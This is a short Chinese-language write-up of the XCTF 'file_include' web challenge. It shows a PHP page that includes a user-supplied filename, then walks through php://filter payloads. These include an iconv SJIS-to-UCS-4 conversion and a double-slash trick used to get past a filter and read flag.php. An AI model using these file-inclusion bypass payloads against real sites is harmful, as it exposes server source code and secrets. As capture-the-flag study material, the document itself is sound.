XCTF-web-file_include
解析
<?php
highlight_file(__FILE__); // 高亮显示当前PHP文件源代码
include("./check.php"); // 包含检查文件(可能包含安全过滤逻辑)if(isset($_GET['filename'])) { // 检查是否传入filename参数$filename = $_GET['filename']; // 获取用户传入的文件名include($filename); // 直接包含该文件
}
?>
?filename=php://filter/convert.base64-encode/resource=./check.php,并没有得到flag
尝试绕过
?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=index.php
php://filter是PHP的一种输入/输出流过滤器,用于对资源进行转换操作。
convert.iconv.SJIS*.UCS - 4*表示使用iconv转换,将编码从SJIS相关编码转换为UCS - 4相关编码。
resource=index.php表示要处理的资源是“index.php”文件
将恶意代码用 SJIS 编码后,再通过 convert.iconv 转换为 UCS-4 编码
*通配符可能绕过了过滤规则中对特定编码格式的检查
URL 中的双斜杠 // 可能被某些解析器处理为单斜杠,绕过路径检查
?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=./check.php但是并没有得到flag
?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=./flag.php得到flag
